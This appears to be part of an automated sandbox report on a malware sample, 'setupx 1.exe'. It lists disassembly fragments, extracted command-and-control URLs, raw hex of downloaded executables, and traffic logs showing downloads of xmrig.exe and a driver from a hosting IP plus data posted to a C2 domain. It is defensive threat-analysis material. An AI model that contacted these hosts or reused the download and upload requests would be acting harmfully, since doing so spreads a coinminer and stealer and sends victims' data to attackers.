                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch]2_2_00420EA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h2_2_00420EA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h2_2_00420EA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]2_2_0042F760
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]2_2_0042F760
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then lea ebp, dword ptr [edx+ecx]2_2_0042F760
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then inc ebx2_2_00401040
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov dword ptr [esp], edx2_2_0044B840
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah]2_2_00431850
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov eax, ebx2_2_00424030
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov word ptr [eax], dx2_2_004208F5
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then jmp dword ptr [00451774h]2_2_0041F888
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00420091
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h]2_2_004288A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_004288A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004288A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0041312E
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov word ptr [ecx], si2_2_004201C3
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_0040A1E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_0040A1E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx eax, byte ptr [ecx+esi]2_2_0040B240
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h]2_2_004112E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_0042031B
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh]2_2_0040D3D0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov dword ptr [esi+04h], edx2_2_004113E2
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then push edi2_2_004313F7
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah]2_2_0042FB80
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]2_2_0041AC10
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh2_2_0041ACD0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh2_2_0041ACD0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh]2_2_0040C4E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then and esi, 80000000h2_2_0040BC80
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then push ebx2_2_0041FC88
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+10h]2_2_0040FCB0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov dword ptr [esp+18h], ecx2_2_0041D4B8
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]2_2_00444542
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043FD70
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_00446D30
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]2_2_00446D30
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_00446D30
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h]2_2_0042FDCC
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h]2_2_004485D1
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]2_2_0042ED90
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]2_2_0042ED90
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h]2_2_0041E5BB
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00423612
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004336C0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h]2_2_004236E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h]2_2_004326FC
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00437682
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h]2_2_00432E9E
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then push edi2_2_00431775
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [edx]2_2_00431FCA
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_00402780
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+24h]2_2_0041EF9E
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]2_2_0043F7B0
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_054B4668

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: citydisco.bet/gdJIS
                  Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
                  Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
                  Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
                  Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
                  Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
                  Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
                  Source: Malware configuration extractorURLs: bugildbett.top/bAuz
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:33:56 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:34:03 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:34:03 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49692 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49690 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.8:49701 -> 185.215.113.51:80
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PF7T3HoaLds6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14499Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6XEyhosNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15025Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SHu2usqr78969User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20219Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n1eA4K8BqyRYg06s7EMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2455Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=82suKX2btIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552658Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: citydisco.bet
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
